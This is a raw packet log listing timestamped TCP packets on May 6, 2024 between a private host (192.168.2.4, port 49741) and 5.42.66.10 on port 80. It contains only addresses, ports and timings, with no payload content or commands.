May 6, 2024 07:53:04.797348976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797358036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797384977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797418118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797430992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797441959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797452927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797456026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797463894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797476053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797480106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797488928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797501087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797514915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797514915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797533989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797597885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797610998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797621965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797632933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797637939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797643900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797655106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797660112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797667027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797677994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797683001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797689915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797700882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797702074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797713041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797715902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797741890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797744989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797756910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797766924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797768116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797780037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797790051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797791004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797802925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797811985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797813892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797826052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797835112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797840118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797858953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797872066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797887087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797899008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797909021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797921896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797924042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797946930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797971964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798062086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798074007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798084974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798096895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798100948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798108101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798114061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798120975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798131943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798131943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798144102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798156023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798156023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798166990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798167944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798178911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798191071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798196077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798202038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798213005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798217058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798230886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798234940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798240900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798253059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798254013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798269987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798280001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798281908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798291922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798304081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798304081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798316002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798317909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798326969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798337936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798340082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798350096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798362017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798365116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798373938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798377991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798386097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798396111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798398018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798410892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798418045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798423052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798430920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798459053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798552036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798563957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798580885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798592091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798593998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798604012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798614979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798616886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798626900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798638105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798639059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798664093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798669100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798672915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798681021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798691988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798702955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798711061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798715115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798727989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798728943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798738003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798749924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798753023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798760891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798778057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798789024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798814058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798871994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798883915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798894882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798903942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798906088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798914909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798923969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798926115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798938036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798942089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798949957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798960924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798964024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.798973083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.798975945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799002886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799005985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799017906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799026012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799029112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799041986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799046040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799052954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799065113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799072027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799077988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799091101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799098015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799124956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799130917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799140930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799154043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799164057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799175024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799179077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799186945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799195051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799197912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799210072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799210072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799221992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799232960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799236059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799243927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799248934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799256086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799267054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799276114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799278975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799289942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799297094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799303055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799310923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799314976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799326897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799329042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799339056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799350977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799351931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799361944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799367905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799376965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799381018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799391031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799393892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799405098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799410105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799417973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799429893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799432993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799446106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799455881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799458981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799473047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799495935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799535036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799566984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799710035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799721003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799731016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799748898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799761057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799773932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799863100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799875021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799885035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799896002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799901009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799907923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799911022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799921036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799930096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799932957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799943924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799952984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799956083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799967051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799968004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799982071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.799988985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.799993992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800004959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800017118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800024033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800024033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800029039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800041914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800054073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800056934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800065994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800077915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800082922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800090075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800101995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800107956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800110102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800117970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800133944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800138950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800151110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800162077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800163984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800173998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800189018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800213099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800271988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800282955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800293922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800304890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800307035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800318003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800329924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800332069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800343037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800354958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800358057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800367117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800369978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800399065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800463915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800477028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800487995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800498009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800504923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800508976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800520897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800523043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800532103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800544024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800550938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800554991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800565958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800575018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800578117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800590038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800599098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800601959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800612926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800622940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800626040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800632954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800637960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800647974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800659895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800663948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800671101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800683022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800688028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800705910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800717115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800751925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800787926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800924063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800935984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800945997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800956964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800962925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800967932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800978899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.800987959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.800990105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801002026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801013947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801018953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801031113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801033020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801043034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801047087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801054955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801064968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801076889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801079035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801090956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801100016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801105022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801115036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801115990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801139116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801161051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801237106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801249027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801259995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801271915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801275969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801284075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801287889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801296949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801309109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801311016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801321030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801332951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801333904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801343918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801373959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801373959 CEST	49741	80	192.168.2.4	5.42.66.10
